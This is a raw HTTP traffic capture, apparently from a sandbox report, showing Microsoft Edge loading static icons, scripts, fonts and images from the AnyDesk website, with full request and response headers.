content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: Bh7zJrKIcMiWzfQuI099cB7wmOUiwH5hmQDs7f0_lcX93xBttE-NvA==
age: 61627
GET

https://anydesk.com/_static/icons/white/bold/arrow-up-38ccc5.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/white/bold/arrow-up-38ccc5.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: HzBpnPnXDZ1neFiovTEwNRONxHcWFce-Xc0vFX0R3IN2i7SQncr2rg==
age: 61627
GET

https://anydesk.com/_static/icons/red/bold/phone-circle-186093.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/bold/phone-circle-186093.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: Z_ewmXRYq6jgjPkA2RYnASrMYLywmbAsLdBOfCVN9EohQpojsvBKTQ==
age: 61627
GET

https://anydesk.com/_static/js/jquery-3.5.1.min-d2cc8d.js

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/js/jquery-3.5.1.min-d2cc8d.js HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: text/javascript;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: ypLJCAqCHwt481wtdxUFHXCWE5ZQdMvpC1AumL3piWIrI2B3XM5A4Q==
age: 61626
GET

https://anydesk.com/_static/js/popper.min-60cc59.js

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/js/popper.min-60cc59.js HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: text/javascript;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: ucBRdENfabaPDRJfJ4EvFElxcG7g34L33Qj5IGtZnmX4eCNS8eSEhg==
age: 61626
GET

https://anydesk.com/_static/js/bootstrap.min-0cc93b.js

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/js/bootstrap.min-0cc93b.js HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: text/javascript;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: MS1tivthUW4563C6UKp2UNHbv985X8LnnFSTHgjwl2b4cICt1I6lyg==
age: 61627
GET

https://anydesk.com/_static/js/bootstrap-select/bootstrap-select.min-44f87f.js

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/js/bootstrap-select/bootstrap-select.min-44f87f.js HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: text/javascript;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: SDCjAYOryhG3cImaeqGo-CbCQ75FpNFs7btgg1UzDtTR4TBwawjyWA==
age: 61627
GET

https://anydesk.com/_static/js/anydesk.min-a98a7d.js

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/js/anydesk.min-a98a7d.js HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: text/javascript;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 1ela0m2J_lrnxGfSwoa9BTXG4fc2ieX54f2jz6LFJESIZBACocR1Ng==
age: 61627
GET

https://anydesk.com/_static/js/slick.min-3b41b3.js

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/js/slick.min-3b41b3.js HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: text/javascript;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: zIh7tn1RR-0tGxWT56yMPLzBPafTUbyEOF1HEOle-dyiVR4Qdft-DA==
age: 61627
GET

https://anydesk.com/_static/icons/black/medium/arrow-down-1-38c71c.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/black/medium/arrow-down-1-38c71c.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 03lTGtNWwBFCDuEBeUKHwFmLRdGCNeN9Jiw8z6QpUrP6bBHiBZ-tZw==
age: 61628
GET

https://anydesk.com/_static/icons/red/bold/arrow-down-1-13dd01.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/bold/arrow-down-1-13dd01.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: Ws5gjLM7VbNqFa5BNzKepqBmvw2uN5FK0H20qGLnCrwTW_kmdvpjHA==
age: 61628
GET

https://anydesk.com/_static/img/logos/anydesk-logo-white-red-ec4e3a.png

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/logos/anydesk-logo-white-red-ec4e3a.png HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/png;charset=UTF-8
content-length: 2932
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: ebhlBCHhfm41SWrXIORmISUHQ_x__hDAI4tee4IdYE-RyKly_hQHLA==
age: 61628
GET

https://anydesk.com/_static/img/logos/anydesk-logo-c0861c.png

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/logos/anydesk-logo-c0861c.png HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/png;charset=UTF-8
content-length: 3183
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: Iod1yXlhRojPMGTsbxu32lASror6Tvya7y-5texPdIpCrBFoSHbk5g==
age: 61628
GET

https://anydesk.com/_static/fonts/noto-sans/notosans-700.woff2

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/fonts/noto-sans/notosans-700.woff2 HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://anydesk.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://anydesk.com/_static/css/anydesk.min-5cb24b.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: m331TOdvDAn0RH8vK7O3gBPnzp9nmBIeXoo3uJ0Pbu4SJTbnnwT_hw==
age: 61627
GET

https://anydesk.com/_static/fonts/noto-sans/notosans-400.woff2

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/fonts/noto-sans/notosans-400.woff2 HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://anydesk.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://anydesk.com/_static/css/anydesk.min-5cb24b.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: 8f0imLHs8vEKJBgjOMQVTMc0mf1reIAD28ErzP-eyfWRNPth0hTBMQ==
age: 61627
GET

https://anydesk.com/_static/fonts/noto-sans/notosans-300.woff2

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/fonts/noto-sans/notosans-300.woff2 HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
origin: https://anydesk.com
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
dnt: 1
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: font
referer: https://anydesk.com/_static/css/anydesk.min-5cb24b.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: application/octet-stream;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: y5WKQ2u6vc1OwWOqkwreXO0vfiIsl4Ds7icNnlM0I7LUvQQuuUk-Ww==
age: 61627
GET

https://anydesk.com/_static/icons/white/bold/arrow-down-1-ec7f5c.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/white/bold/arrow-down-1-ec7f5c.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: PlDJc3RQ4hMBa7qPaqY5G9XJWU5h9h-ClYmZn_TgvPXsW8CdVA5ybw==
age: 61628
GET

https://anydesk.com/_static/icons/black/bold/keyboard-arrow-top-right-7aaa41.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/black/bold/keyboard-arrow-top-right-7aaa41.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: ixNYQYfT93ohVJ8zcGBH6S2dtd3QLqEtN0GeJYige6-14pHXAGTujA==
age: 61628
GET

https://anydesk.com/_static/icons/red/bold/headphones-customer-support-human-6e41ee.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/bold/headphones-customer-support-human-6e41ee.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:41 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: ikP7BFRmsYICJh4MUihoiZpjrLSKm85YczhzUL1Uj1jfQ5r1o0HqoA==
age: 61627
GET

https://anydesk.com/_static/icons/red/bold/download-bottom-278e26.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/icons/red/bold/download-bottom-278e26.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:40 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: F1ROEoPRN1ufDb98peUGhPdD8csInTgmn8bKRhoi4brqv9mONpIuLg==
age: 61628
GET

https://anydesk.com/_static/flags/4x3/us.svg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/flags/4x3/us.svg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/_static/css/anydesk.min-5cb24b.css
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: JSESSIONID=F49B6F21DEE61FD49B2BA838CFDD7F9D

Response

HTTP/2.0 200

content-type: image/svg+xml;charset=UTF-8
server: nginx
date: Fri, 04 Oct 2024 23:00:42 GMT
cache-control: max-age=31536000
content-disposition: inline
content-language: en-US
strict-transport-security: max-age=15552000
x-frame-options: DENY
content-security-policy: frame-ancestors 'self';
content-encoding: gzip
x-cache: Hit from cloudfront
via: 1.1 2c4f54cad5da50a372b086710d5ffc62.cloudfront.net (CloudFront)
x-amz-cf-pop: DUS51-P1
x-amz-cf-id: -WrXAjNqJ-AMGwoVPRp_VwpZCLFRp9yVHP_QEhaaQvbSmSFolO11ZA==
age: 61626
GET

https://anydesk.com/_static/img/hero/what-is-new-v8-small-254c07.jpg

msedge.exe

Remote address:

18.66.248.51:443

Request

GET /_static/img/hero/what-is-new-v8-small-254c07.jpg HTTP/2.0
host: anydesk.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://anydesk.com/en
